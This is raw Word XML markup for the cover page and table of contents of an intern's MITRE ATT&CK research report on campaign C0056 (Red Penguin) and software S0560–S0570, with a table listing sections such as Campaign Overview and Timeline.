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04796" w14:textId="651AA34C" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="00C94863">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09743912" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B463B6C" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098F318A" w14:textId="696B4EE2" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Research Internship</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="305F1E33" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E71262" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF19E40" w14:textId="62B76E78" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Intern ID: </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2156</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Assigned Campaign:</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C0056 —</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Red</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Penguin</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Assigned Software Range:</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S0560 – S0570</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C95389" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB934BB" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9BDD49" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A050311" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DCD6A5" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5292BF08" w14:textId="77777777" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8F08CB" w14:textId="77777777" w:rsidR="0084001D" w:rsidRDefault="0084001D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F13AD63" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="003168F2" w:rsidRDefault="005632D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CCDCE4" w14:textId="33D5C3F6" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitted By:</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AVADHOOT KAILAS DHANU</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C4D439" w14:textId="7473C282" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632427AB" w14:textId="17F9FBBA" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="005632D5" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C3AC3D8" wp14:editId="6153D5D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1797978</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-63778</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1187397554" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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A035F35" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:141.55pt;margin-top:-5pt;width:240pt;height:33.75pt;z-index:2516838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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C94863" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tables of Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2C4AAC" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9923" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="789"/>
        <w:gridCol w:w="4957"/>
        <w:gridCol w:w="3144"/>
        <w:gridCol w:w="1033"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C94863" w:rsidRPr="003168F2" w14:paraId="1E3EC563" w14:textId="77777777" w:rsidTr="00175DEC">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4E42D9D0" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Sr. No. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>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5AAE93C" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Title</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8C2A4F3" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Page No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="52C6BA2B" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="692728E6" w14:textId="53E4DA2C" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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E58F9C4" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Campaign Research — C0056 RedPenguin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672917E" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Campaign Overview</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4447EF2" w14:textId="37D5DCA6" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="67397D9B" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE0DC90" w14:textId="093C3EDD" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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97A4B17" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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39F95D5" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Threat Actor Association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C43FC79" w14:textId="70D25E70" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="4FACF196" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2394805F" w14:textId="0C6B524D" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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130D86EB" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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8FDA703" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Timeline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5FCD611" w14:textId="64291644" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
